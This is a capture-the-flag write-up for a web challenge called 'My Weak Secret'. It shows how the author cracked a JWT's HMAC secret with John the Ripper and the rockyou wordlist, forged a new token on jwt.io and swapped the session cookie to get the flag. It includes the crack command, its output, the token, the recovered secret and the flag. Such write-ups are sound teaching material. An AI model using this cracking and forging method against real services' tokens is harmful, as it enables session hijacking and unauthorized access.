My Weak Secret
Category: Web
100 points
Never use weak secrets. I repeat NEVER.
http://chall.nitdgplug.org:30299
Solution
Challenge description is a hint, that weak password has been used. So, I’ve used John The Ripper to try bruteforce.
Firstly, I’ve saved the jwt into the file. (you can try it by yourself, here it is
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZXJyb3IifQ.XALcPJYbkoM2OvMjOrFCBb5w4CuYSavfjgCL_RHymjU).
Secondly, launched Johnny.
john --wordlist=/home/luc/Pobrane/rockyou.txt --format=HMAC-SHA256 jwt.txtUsing default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badboy (?)
1g 0:00:00:00 DONE (2021-04-01 17:05) 50.00g/s 819200p/s 819200c/s 819200C/s 123456..christal
Use the "--show" option to display all of the cracked passwords reliably
Session completed. And then forged new jwt with https://jwt.io
Then, I switched the jwt cookie and get the reward.
Flag
GLUG{us3_5tr0ng_jw7_s3cr37}